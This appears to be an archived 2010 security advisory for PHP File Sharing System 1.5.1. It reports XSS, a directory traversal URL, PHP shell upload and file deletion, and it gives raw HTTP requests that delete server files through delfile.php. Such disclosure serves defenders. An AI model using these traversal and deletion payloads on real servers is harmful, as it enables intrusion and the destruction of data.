PHP File Sharing System 1.5.1 xss directory traversal and shell upload

2010.03.10
Credit: blake
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: PHP File Sharing System 1.5.1 Multiple Vulnerabilities Date: March 8, 2010 Author: blake Download: http://sourceforge.net/projects/phpfilesadmin/ Version: 1.5.1 Tested on: Windows XP SP3 with xampplite 1) XSS http://192.168.1.149/fss/index.php?cam= 2) Directory transversal http://192.168.1.149/fss/index.php?cam=/../../../../../../../.. 3) Shell through file upload can upload php shell, click on file, and get shell 4) can intercept requests using proxy and delete system files intercept request in webscarab GET http://192.168.1.149:80/fss/delfile.php?cam=&dlfile=./uploads/reverse_shell_windows.php HTTP/1.1 Host: 192.168.1.149 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.1.149/fss/index.php?cam= and modify GET http://192.168.1.149:80/fss/delfile.php?cam=&dlfile=log.txt HTTP/1.1 Host: 192.168.1.149 User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://192.168.1.149/fss/index.php?cam=


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top